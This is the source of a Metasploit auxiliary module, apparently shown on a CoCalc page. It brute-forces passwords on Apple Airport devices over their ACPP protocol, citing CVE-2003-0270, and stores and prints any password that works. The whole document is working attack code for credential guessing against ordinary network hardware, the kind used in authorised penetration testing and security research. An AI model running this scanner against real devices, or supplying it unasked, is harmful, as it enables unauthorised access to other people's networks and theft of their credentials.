CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
require 'metasploit/framework/credential_collection'
7
require 'metasploit/framework/login_scanner/acpp'
8

9
class MetasploitModule < Msf::Auxiliary
10
  include Msf::Exploit::Remote::Tcp
11
  include Msf::Auxiliary::Scanner
12
  include Msf::Auxiliary::Report
13
  include Msf::Auxiliary::AuthBrute
14

15
  def initialize
16
    super(
17
      'Name'        => 'Apple Airport ACPP Authentication Scanner',
18
      'Description' => %q(
19
        This module attempts to authenticate to an Apple Airport using its
20
        proprietary and largely undocumented protocol known only as ACPP.
21
      ),
22
      'Author'      =>
23
        [
24
          'Jon Hart <jon_hart[at]rapid7.com>'
25
        ],
26
      'References'     =>
27
        [
28
          %w(CVE 2003-0270) # Fixed XOR key used to encrypt password
29
        ],
30
      'License'     => MSF_LICENSE
31
    )
32

33
    register_options(
34
      [
35
        Opt::RPORT(Rex::Proto::ACPP::DEFAULT_PORT)
36
      ])
37

38
    deregister_options(
39
      # there is no username, so remove all of these options
40
      'DB_ALL_USERS',
41
      'DB_ALL_CREDS',
42
      'DB_SKIP_EXISTING',
43
      'USERNAME',
44
      'USERPASS_FILE',
45
      'USER_FILE',
46
      'USER_AS_PASS'
47
    )
48

49
    register_autofilter_ports([Rex::Proto::ACPP::DEFAULT_PORT])
50
  end
51

52
  def run_host(ip)
53
    vprint_status("#{ip}:#{rport} - Starting ACPP login sweep")
54

55
    cred_collection = Metasploit::Framework::PrivateCredentialCollection.new(
56
      blank_passwords: datastore['BLANK_PASSWORDS'],
57
      pass_file: datastore['PASS_FILE'],
58
      password: datastore['PASSWORD']
59
    )
60
    cred_collection = prepend_db_passwords(cred_collection)
61

62
    scanner = Metasploit::Framework::LoginScanner::ACPP.new(
63
      configure_login_scanner(
64
        host: ip,
65
        port: rport,
66
        proxies: datastore['PROXIES'],
67
        cred_details: cred_collection,
68
        stop_on_success: datastore['STOP_ON_SUCCESS'],
69
        bruteforce_speed: datastore['BRUTEFORCE_SPEED'],
70
        connection_timeout: datastore['ConnectTimeout'],
71
        max_send_size: datastore['TCP::max_send_size'],
72
        send_delay: datastore['TCP::send_delay'],
73
        framework: framework,
74
        framework_module: self,
75
        ssl: datastore['SSL'],
76
        ssl_version: datastore['SSLVersion'],
77
        ssl_verify_mode: datastore['SSLVerifyMode'],
78
        ssl_cipher: datastore['SSLCipher'],
79
        local_port: datastore['CPORT'],
80
        local_host: datastore['CHOST']
81
      )
82
    )
83

84
    scanner.scan! do |result|
85
      credential_data = result.to_h
86
      credential_data.merge!(
87
        module_fullname: fullname,
88
        workspace_id: myworkspace_id
89
      )
90
      password = result.credential.private
91
      if result.success?
92
        credential_core = create_credential(credential_data)
93
        credential_data[:core] = credential_core
94
        create_credential_login(credential_data)
95
        print_good("#{ip}:#{rport} - ACPP Login Successful: #{password}")
96
        report_vuln(
97
          host: ip,
98
          port: rport,
99
          proto: 'tcp',
100
          name: 'Fixed XOR key used to encrypt passwords',
101
          info: "Successful authentication with '#{password}'",
102
          refs: references
103
        )
104
      else
105
        invalidate_login(credential_data)
106
        vprint_error("#{ip}:#{rport} - ACPP LOGIN FAILED: #{password} (#{result.status}: #{result.proof})")
107
      end
108
    end
109
  end
110
end
111

112